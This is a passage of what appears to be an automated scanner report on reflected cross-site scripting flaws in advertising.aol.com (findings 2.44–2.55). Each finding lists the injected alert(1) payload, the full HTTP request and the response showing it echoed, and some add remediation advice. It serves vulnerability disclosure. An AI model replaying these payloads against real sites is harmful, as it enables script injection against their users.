Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/a66c4"-alert(1)-"3b4789d5bc5/5/1/411946761/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

2.44. http://advertising.aol.com/token/5/1/411946761/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/1/411946761/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30825"><script>alert(1)</script>4cd80c6f3f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /30825"><script>alert(1)</script>4cd80c6f3f5/5/1/411946761/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=53b281ebc523c4d49ef7102d976fcbb2; expires=Tue, 06 Dec 2011 22:26:02 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/30825"><script>alert(1)</script>4cd80c6f3f5/5/1/411946761/" />
...[SNIP]...

2.45. http://advertising.aol.com/token/5/3/687316672/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/3/687316672/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 657ba"><script>alert(1)</script>68442b80812 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /657ba"><script>alert(1)</script>68442b80812/5/3/687316672/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=d5521ffe22fcf07d84e59ac1769ba115; expires=Tue, 06 Dec 2011 22:29:02 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/657ba"><script>alert(1)</script>68442b80812/5/3/687316672/" />
...[SNIP]...

2.46. http://advertising.aol.com/token/5/3/687316672/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/3/687316672/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd639"-alert(1)-"b49043eef9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fd639"-alert(1)-"b49043eef9f/5/3/687316672/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=ebc22eb425831eb40d40ebe3d271ad56; expires=Tue, 06 Dec 2011 22:29:10 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/fd639"-alert(1)-"b49043eef9f/5/3/687316672/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

2.47. http://advertising.aol.com/token/6/1/633460859/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/1/633460859/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8765"><script>alert(1)</script>bfbd5472335 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f8765"><script>alert(1)</script>bfbd5472335/6/1/633460859/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=76ef53ca048d9f045c6a919b7b029a00; expires=Tue, 06 Dec 2011 22:26:04 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/f8765"><script>alert(1)</script>bfbd5472335/6/1/633460859/" />
...[SNIP]...

2.48. http://advertising.aol.com/token/6/1/633460859/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/1/633460859/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20bd4"-alert(1)-"0227ee5f653 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /20bd4"-alert(1)-"0227ee5f653/6/1/633460859/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=19ce6192f48dc0222faef236aee6e36b; expires=Tue, 06 Dec 2011 22:26:09 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/20bd4"-alert(1)-"0227ee5f653/6/1/633460859/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

2.49. http://advertising.aol.com/token/6/3/207984165/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/3/207984165/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 524eb"-alert(1)-"dbe4bb9b76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /524eb"-alert(1)-"dbe4bb9b76/6/3/207984165/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=78500cb09799365ed0fd1ab750e36e40; expires=Tue, 06 Dec 2011 22:29:10 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/524eb"-alert(1)-"dbe4bb9b76/6/3/207984165/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

2.50. http://advertising.aol.com/token/6/3/207984165/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/3/207984165/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 410cb"><script>alert(1)</script>9e49a1baf78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /410cb"><script>alert(1)</script>9e49a1baf78/6/3/207984165/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:40 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=f35dc9fd54cc63b0eb5ee5fc1ad0353b; expires=Tue, 06 Dec 2011 22:29:00 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/410cb"><script>alert(1)</script>9e49a1baf78/6/3/207984165/" />
...[SNIP]...

2.51. http://advertising.aol.com/token/7/1/1742489720/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/1/1742489720/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e98c4"><script>alert(1)</script>cce048fb7ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e98c4"><script>alert(1)</script>cce048fb7ce/7/1/1742489720/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=fbad944e7db3e22dfb02e0dc0386888a; expires=Tue, 06 Dec 2011 22:26:16 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/e98c4"><script>alert(1)</script>cce048fb7ce/7/1/1742489720/" />
...[SNIP]...

2.52. http://advertising.aol.com/token/7/1/1742489720/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/1/1742489720/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd226"-alert(1)-"27aabe724a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dd226"-alert(1)-"27aabe724a0/7/1/1742489720/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=c0a0050b9fac8fdcca1c3f2bc0e1eb37; expires=Tue, 06 Dec 2011 22:26:19 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/dd226"-alert(1)-"27aabe724a0/7/1/1742489720/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

2.53. http://advertising.aol.com/token/7/3/882396611/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/3/882396611/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f346b"><script>alert(1)</script>7528e397c55 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f346b"><script>alert(1)</script>7528e397c55/7/3/882396611/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:39 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=07af459d09050dd9031948bc9d64d33f; expires=Tue, 06 Dec 2011 22:28:59 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/f346b"><script>alert(1)</script>7528e397c55/7/3/882396611/" />
...[SNIP]...

2.54. http://advertising.aol.com/token/7/3/882396611/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/3/882396611/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70e53"-alert(1)-"45757312f50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /70e53"-alert(1)-"45757312f50/7/3/882396611/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=d6f9efb5f331b87807360d36a06a6808; expires=Tue, 06 Dec 2011 22:29:09 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/70e53"-alert(1)-"45757312f50/7/3/882396611/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

2.55. http://advertising.aol.com/token/8/1/293319859/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/1/293319859/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fa0b"><script>alert(1)</script>8be81e07a93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /6fa0b"><script>alert(1)</script>8be81e07a93/8/1/293319859/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
